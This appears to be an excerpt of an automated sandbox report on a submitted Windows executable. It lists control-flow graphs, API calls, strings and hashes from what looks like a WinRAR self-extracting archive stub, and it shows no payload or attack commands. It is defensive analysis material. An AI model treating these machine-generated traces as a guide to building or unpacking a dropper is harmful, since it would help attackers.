                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                                • API String ID: 3616063595-3000381960
                                                • Opcode ID: 8979191c656d2815237007749faf82bb97f260ce3440df89e546f23695c72be0
                                                • Instruction ID: 685a7b5044d7f2b2b13d3e2cc6825fe9e93e3cccedae4173219deffa5282160a
                                                • Opcode Fuzzy Hash: 8979191c656d2815237007749faf82bb97f260ce3440df89e546f23695c72be0
                                                • Instruction Fuzzy Hash: B972C470950358EEEB24EBA4EC49BEE7BF9AB11702F0044D5F509B71D2DBB45A84CB21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 379 b16d7b-b16dd1 call b25b20 GetModuleHandleW 382 b16dd3-b16de3 GetProcAddress 379->382 383 b16e28-b1708c 379->383 384 b16de5-b16dfb 382->384 385 b16dfd-b16e0d GetProcAddress 382->385 386 b17092-b1709d call b2e50e 383->386 387 b1719b 383->387 384->385 385->383 388 b16e0f-b16e24 385->388 386->387 394 b170a3-b170b8 call b113f9 386->394 389 b1719d-b171be call b113f9 call b12117 387->389 388->383 404 b171c0-b171cc call b1067e 389->404 402 b170ba 394->402 403 b170bd-b170d5 CreateFileW 394->403 402->403 406 b17186-b17199 CloseHandle call b01a66 403->406 407 b170db-b170e7 SetFilePointer 403->407 411 b17203-b17234 call b014a7 call b1229d call b01a66 call b0ed1f 404->411 412 b171ce-b171dc call b16c5e 404->412 406->389 407->406 409 b170ed-b17107 ReadFile 407->409 409->406 413 b17109-b17114 409->413 447 b17239-b1723c 411->447 412->411 423 b171de-b17201 CompareStringW 412->423 417 b173f2-b173f7 call b25ce1 413->417 418 b1711a-b1714d call b014a7 413->418 429 b17161-b17174 call b16366 418->429 423->411 427 b1723e-b17242 423->427 427->404 430 b17248 427->430 436 b17176-b17181 call b01a66 * 2 429->436 437 b1714f-b17156 429->437 433 b1724c-b17250 430->433 438 b17252 433->438 439 b17296-b17298 433->439 436->406 445 b17158 437->445 446 b1715b-b1715c call b16c5e 437->446 444 b17254-b1728a call b014a7 call b1229d call b01a66 call b0ed1f 438->444 441 b173bd-b173ef call b01a66 * 2 call b25734 439->441 442 b1729e-b172b1 call b12187 call b1067e 439->442 464 b172b3-b17330 call b16c5e * 2 call b14318 call b16a25 call b14318 call b014a7 call b1ecf5 call b01549 442->464 465 b17332-b17366 call b16a25 AllocConsole 442->465 482 b17294 444->482 483 b1728c-b17290 444->483 445->446 446->429 447->427 453 b1724a 447->453 453->433 479 b173b0-b173b7 call b01549 ExitProcess 464->479 476 b17368-b173a7 GetCurrentProcessId AttachConsole call b17441 call b17436 GetStdHandle WriteConsoleW Sleep FreeConsole 465->476 477 b173ad 465->477 476->477 477->479 482->439 483->444 487 b17292 483->487 487->439
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32,5EA84158), ref: 00B16DC7
                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B16DD9
                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B16E03
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B170CA
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B170DF
                                                • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00B170FF
                                                • CloseHandle.KERNEL32(00000000), ref: 00B17187
                                                • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00B171F8
                                                • AllocConsole.KERNEL32 ref: 00B1735E
                                                • GetCurrentProcessId.KERNEL32 ref: 00B17368
                                                • AttachConsole.KERNEL32(00000000), ref: 00B1736F
                                                • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00B1738F
                                                • WriteConsoleW.KERNEL32(00000000), ref: 00B17396
                                                • Sleep.KERNEL32(00002710), ref: 00B173A1
                                                • FreeConsole.KERNEL32 ref: 00B173A7
                                                • ExitProcess.KERNEL32 ref: 00B173B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                • API String ID: 2644799563-3298887752
                                                • Opcode ID: 2eea7bf3036519e155a6af5c6b0fd12b67003544dc8d6c3b38043fb9bec01a73
                                                • Instruction ID: 69ca7304b3019a77c6eb2c83bdef8ee37c79b4fad38810ebb621dfab2561cf43
                                                • Opcode Fuzzy Hash: 2eea7bf3036519e155a6af5c6b0fd12b67003544dc8d6c3b38043fb9bec01a73
                                                • Instruction Fuzzy Hash: FEF1807240428CEBCB24DFA4DC49BDE3BE9FF05304F604599F919AB291DB709A49CB91

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00B20678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B20689
                                                  • Part of subcall function 00B20678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2069A
                                                  • Part of subcall function 00B20678: IsDialogMessageW.USER32(00010460,?), ref: 00B206AE
                                                  • Part of subcall function 00B20678: TranslateMessage.USER32(?), ref: 00B206BC
                                                  • Part of subcall function 00B20678: DispatchMessageW.USER32(?), ref: 00B206C6
                                                • GetDlgItem.USER32(00000068,00000000), ref: 00B23595
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00B1FD20,00000001,?,?), ref: 00B235BA
                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B235C9
                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B3C6C8), ref: 00B235D7
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B235F1
                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B2360B
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2364F
                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B23662
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B23675
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2369C
                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B3C860), ref: 00B236AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                • String ID: \
                                                • API String ID: 3569833718-2967466578
                                                • Opcode ID: 33b01fee673ca37801bc96b710152a333d321c5a13737f1c4cea7d0165fa5997
                                                • Instruction ID: 56f0930f77adcb2b2c3d87a01515ed38e5e57f616f1eb7ef333ea178b0dfd83f
                                                • Opcode Fuzzy Hash: 33b01fee673ca37801bc96b710152a333d321c5a13737f1c4cea7d0165fa5997
                                                • Instruction Fuzzy Hash: 0D31C371289B00BFE3119F20EC49F6B7BECEB55702F0005D9FA55A71A1DFB499048BA6

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 632 b238a0-b238bc call b257d8 635 b238c2-b238c8 632->635 636 b23bc7-b23bd4 call b01a66 call b25787 632->636 635->636 637 b238ce-b238f4 call b271f0 635->637 643 b238f6 637->643 644 b238fd-b23909 637->644 643->644 646 b2390b 644->646 647 b2390d-b23916 644->647 646->647 648 b23924-b23927 647->648 649 b23918-b2391b 647->649 650 b2392b-b23935 648->650 651 b23929 648->651 652 b2391f-b23922 649->652 653 b2391d 649->653 654 b2393b-b23948 650->654 655 b239ce 650->655 651->650 652->650 653->652 656 b2394a 654->656 657 b2394c-b23956 654->657 658 b239d1-b239d3 655->658 656->657 659 b23958 657->659 660 b2398c-b23999 657->660 661 b239d5-b239da 658->661 662 b239dc-b239de 658->662 665 b2396f-b23972 659->665 663 b2399b 660->663 664 b2399d-b239a7 660->664 661->662 666 b239ff-b23a11 call b11383 661->666 662->666 667 b239e0-b239e7 662->667 663->664 669 b23bd7-b23bdd 664->669 670 b239ad-b239b2 664->670 671 b23974 665->671 672 b2395a-b2395f 665->672 685 b23a13-b23a20 call b18da4 666->685 686 b23a29-b23a64 call b014a7 call b0ed0d call b01a66 666->686 667->666 673 b239e9-b239f5 667->673 681 b23be1-b23be8 669->681 682 b23bdf 669->682 675 b239b6-b239bc 670->675 676 b239b4 670->676 671->660 677 b23963-b2396d 672->677 678 b23961 672->678 679 b239f7 673->679 680 b239fc 673->680 675->669 687 b239c2-b239c5 675->687 676->675 677->665 688 b23976-b2397b 677->688 678->677 679->680 680->666 683 b23c00-b23c06 681->683 684 b23bea-b23bf0 681->684 682->681 692 b23c0a-b23c14 683->692 693 b23c08 683->693 689 b23bf2 684->689 690 b23bf4-b23bfd 684->690 685->686 700 b23a22 685->700 705 b23a66-b23a95 call b014a7 call b10e49 call b01a66 686->705 706 b23a9d-b23aac ShellExecuteExW 686->706 687->654 694 b239cb 687->694 696 b2397f-b23989 688->696 697 b2397d 688->697 689->690 690->683 692->658 693->692 694->655 696->660 697->696 700->686 739 b23a97 705->739 740 b23a9a 705->740 707 b23ab2-b23abc 706->707 708 b23b7c-b23b82 706->708 712 b23aca-b23acc 707->712 713 b23abe-b23ac0 707->713 710 b23bb7-b23bc3 708->710 711 b23b84-b23b99 708->711 710->636 716 b23b9b-b23bab call b019a9 711->716 717 b23bae-b23bb6 call b25726 711->717 719 b23ae5-b23af6 WaitForInputIdle call b23fcf 712->719 720 b23ace-b23ad7 IsWindowVisible 712->720 713->712 718 b23ac2-b23ac8 713->718 716->717 717->710 718->712 724 b23b30-b23b3b CloseHandle 718->724 732 b23afb-b23b02 719->732 720->719 725 b23ad9-b23ae3 ShowWindow 720->725 729 b23b4c-b23b53 724->729 730 b23b3d-b23b4a call b18da4 724->730 725->719 736 b23b55-b23b57 729->736 737 b23b6b-b23b6d 729->737 730->729 730->737 732->724 733 b23b04-b23b06 732->733 733->724 738 b23b08-b23b17 GetExitCodeProcess 733->738 736->737 742 b23b59-b23b5f 736->742 737->708 743 b23b6f-b23b71 737->743 738->724 744 b23b19-b23b22 738->744 739->740 740->706 742->737 745 b23b61 742->745 743->708 746 b23b73-b23b76 ShowWindow 743->746 747 b23b24 744->747 748 b23b29 744->748 745->737 746->708 747->748 748->724
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B238A7
                                                • ShellExecuteExW.SHELL32(?), ref: 00B23AA4
                                                • IsWindowVisible.USER32(?), ref: 00B23ACF
                                                • ShowWindow.USER32(?,00000000), ref: 00B23ADD
                                                • WaitForInputIdle.USER32(?,000007D0), ref: 00B23AED
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00B23B0F
                                                • CloseHandle.KERNEL32(?), ref: 00B23B33
                                                • ShowWindow.USER32(?,00000001), ref: 00B23B76
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                • String ID: .exe$.inf
                                                • API String ID: 3208621885-3750412487
                                                • Opcode ID: 7244f64b9efb63d1cf8ad197058fb645f16b0b559b516735309049b61f772c67
                                                • Instruction ID: 7549710bc76546d1d539fec8b0630542ec149532f09642d06e1d882329aa72fa
                                                • Opcode Fuzzy Hash: 7244f64b9efb63d1cf8ad197058fb645f16b0b559b516735309049b61f772c67
                                                • Instruction Fuzzy Hash: D4B1C231A00368DFCB25DF64E8887ED77F5EF45B10F244199E849A7290DB78AE85CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1052 b23efc-b23f11 call b257d8 1055 b23f13 1052->1055 1056 b23f15-b23f45 SetEnvironmentVariableW call b16366 1052->1056 1055->1056 1058 b23f4a-b23f4c 1056->1058 1059 b23f4e 1058->1059 1060 b23f8c-b23f92 1058->1060 1061 b23f51-b23f57 1059->1061 1062 b23fc7-b23fcc call b25787 1060->1062 1063 b23f94-b23fa9 1060->1063 1066 b23f5b-b23f67 call b16624 1061->1066 1067 b23f59 1061->1067 1064 b23fab-b23fbb call b019a9 1063->1064 1065 b23fbe-b23fc6 call b25726 1063->1065 1064->1065 1065->1062 1076 b23f72-b23f76 1066->1076 1077 b23f69-b23f70 1066->1077 1067->1066 1078 b23f7a-b23f86 SetEnvironmentVariableW 1076->1078 1079 b23f78 1076->1079 1077->1061 1078->1060 1079->1078
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B23F03
                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00B23F1B
                                                • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00B23F86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: EnvironmentVariable$H_prolog3_
                                                • String ID: sfxcmd$sfxpar
                                                • API String ID: 3605364767-3493335439
                                                • Opcode ID: 90a86d7f4d820e8045183537ba76a86168b3c57f79198dad3285c33a8a503825
                                                • Instruction ID: 4521593ae3589f891dbf2cc83740da31ffbc0150c990fc972697733d96c302b1
                                                • Opcode Fuzzy Hash: 90a86d7f4d820e8045183537ba76a86168b3c57f79198dad3285c33a8a503825
                                                • Instruction Fuzzy Hash: 9B21F670D11228DBCB14DFA8EA859EDB7F9EB48700F60445AF449F7250DB34AA45CB64

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00B16C5E: __EH_prolog3_GS.LIBCMT ref: 00B16C65
                                                  • Part of subcall function 00B16C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00B16C9A
                                                • OleInitialize.OLE32(00000000), ref: 00B1F4ED
                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B1F524
                                                • SHGetMalloc.SHELL32(00B5532C), ref: 00B1F52E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                • String ID: riched20.dll$3Ro
                                                • API String ID: 2446841611-3613677438
                                                • Opcode ID: 9abcf3389e2b1704ba2f62c6837cbbb6fa143cb5eb061474e46e0fdbd147e38f
                                                • Instruction ID: 45f5a4615603d37016fe85a59cd31bf80d95a800faf8f59c013127eeb784764c
                                                • Opcode Fuzzy Hash: 9abcf3389e2b1704ba2f62c6837cbbb6fa143cb5eb061474e46e0fdbd147e38f
                                                • Instruction Fuzzy Hash: B5F0FFB5D40209ABCB50AF99D849ADEFBFCEF94701F104096E415A2250DBB456458BA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1084 b0e180-b0e1c9 1085 b0e1d4 1084->1085 1086 b0e1cb-b0e1ce 1084->1086 1088 b0e1d6-b0e1e6 1085->1088 1086->1085 1087 b0e1d0-b0e1d2 1086->1087 1087->1088 1089 b0e1e8 1088->1089 1090 b0e1ee-b0e1f8 1088->1090 1089->1090 1091 b0e1fa 1090->1091 1092 b0e1fd-b0e22a 1090->1092 1091->1092 1093 b0e232-b0e238 1092->1093 1094 b0e22c 1092->1094 1095 b0e23a 1093->1095 1096 b0e23c-b0e254 CreateFileW 1093->1096 1094->1093 1095->1096 1097 b0e316 1096->1097 1098 b0e25a-b0e28a GetLastError call b1169a 1096->1098 1100 b0e319-b0e31c 1097->1100 1104 b0e28c-b0e293 1098->1104 1105 b0e2be 1098->1105 1102 b0e32a-b0e32e 1100->1102 1103 b0e31e-b0e321 1100->1103 1107 b0e330-b0e333 1102->1107 1108 b0e34f-b0e360 1102->1108 1103->1102 1106 b0e323 1103->1106 1109 b0e295 1104->1109 1110 b0e298-b0e2b8 CreateFileW GetLastError 1104->1110 1112 b0e2c1-b0e2cb 1105->1112 1106->1102 1107->1108 1111 b0e335-b0e34c SetFileTime 1107->1111 1113 b0e362-b0e370 call b025c3 1108->1113 1114 b0e374-b0e39a call b01a66 call b25734 1108->1114 1109->1110 1110->1105 1115 b0e2ba-b0e2bc 1110->1115 1111->1108 1116 b0e300-b0e314 1112->1116 1117 b0e2cd-b0e2e2 1112->1117 1113->1114 1115->1112 1116->1100 1120 b0e2e4-b0e2f4 call b019a9 1117->1120 1121 b0e2f7-b0e2ff call b25726 1117->1121 1120->1121 1121->1116
                                                APIs
                                                • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,5EA84158,?,?,00000000,?,?,00000000,00B39E6B,000000FF), ref: 00B0E248
                                                • GetLastError.KERNEL32(?,?,00000000,00B39E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00B0E25A
                                                • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00B39E6B,000000FF,?,00000011), ref: 00B0E2A6
                                                • GetLastError.KERNEL32(?,?,00000000,00B39E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00B0E2AF
                                                • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00B39E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00B0E346
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$CreateErrorLast$Time
                                                • String ID:
                                                • API String ID: 1999340476-0
                                                • Opcode ID: cb94bd37e545a17de51d81d8764f2a3c2b3599236b206c8d93ab235246d54a58
                                                • Instruction ID: 4bbc6d6cb89287a053885ace658f543fd21c20651f72e47fbc2d8b6688a2aa98
                                                • Opcode Fuzzy Hash: cb94bd37e545a17de51d81d8764f2a3c2b3599236b206c8d93ab235246d54a58
                                                • Instruction Fuzzy Hash: 43617B71904249AFDB24CFA4D885BEE7FE4FB08314F204A6AF825A72D0D774E944CB94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1130 b174ec-b17536 call b177cf ReleaseSemaphore 1133 b17556-b1758a DeleteCriticalSection CloseHandle * 2 1130->1133 1134 b17538 1130->1134 1135 b1753b-b17554 call b175ed CloseHandle 1134->1135 1135->1133
                                                APIs
                                                  • Part of subcall function 00B177CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00B073B8), ref: 00B177E1
                                                  • Part of subcall function 00B177CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00B073B8), ref: 00B177F5
                                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000,5EA84158,?,?,00000001,00000000,00B3A603,000000FF,?,00B190B9,?,?,00B05630,?), ref: 00B1752A
                                                • CloseHandle.KERNELBASE(?,?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?), ref: 00B17544
                                                • DeleteCriticalSection.KERNEL32(?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00B1755D
                                                • CloseHandle.KERNEL32(?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00B17569
                                                • CloseHandle.KERNEL32(?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00B17575
                                                  • Part of subcall function 00B175ED: WaitForSingleObject.KERNEL32(?,000000FF,00B1770A,?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175F3
                                                  • Part of subcall function 00B175ED: GetLastError.KERNEL32(?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                • String ID:
                                                • API String ID: 1868215902-0
                                                • Opcode ID: 3e9db0d7f3ca7dc11f4f9d1bea916a329a0e3c18325b7b669679d28a559547c0
                                                • Instruction ID: 73a209f2ad77305a87bc78f98b3bb01a327ec95c5d355e4369c2653619369511
                                                • Opcode Fuzzy Hash: 3e9db0d7f3ca7dc11f4f9d1bea916a329a0e3c18325b7b669679d28a559547c0
                                                • Instruction Fuzzy Hash: 44118E76004744EFC7229FA4DC85BCAFBF9FB08710F504929E156A31A0CF71A9408B60

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1138 b20678-b20691 PeekMessageW 1139 b20693-b206a7 GetMessageW 1138->1139 1140 b206cc-b206ce 1138->1140 1141 b206b8-b206c6 TranslateMessage DispatchMessageW 1139->1141 1142 b206a9-b206b6 IsDialogMessageW 1139->1142 1141->1140 1142->1140 1142->1141
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B20689
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2069A
                                                • IsDialogMessageW.USER32(00010460,?), ref: 00B206AE
                                                • TranslateMessage.USER32(?), ref: 00B206BC
                                                • DispatchMessageW.USER32(?), ref: 00B206C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 1266772231-0
                                                • Opcode ID: 7b3fabce0379df4c4295b7a42e25cc06c06c0ec4c0d127f8dbb9cdfedc00fa02
                                                • Instruction ID: 7a9f10c5719d62b1f9b24f24109eccfcbe62c42ec1be48518032c1abafb85872
                                                • Opcode Fuzzy Hash: 7b3fabce0379df4c4295b7a42e25cc06c06c0ec4c0d127f8dbb9cdfedc00fa02
                                                • Instruction Fuzzy Hash: 51F0B271A0532AABDB20ABE1FC4CEDB7FECEE452527444455B50AD3051EE24D505C7B0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
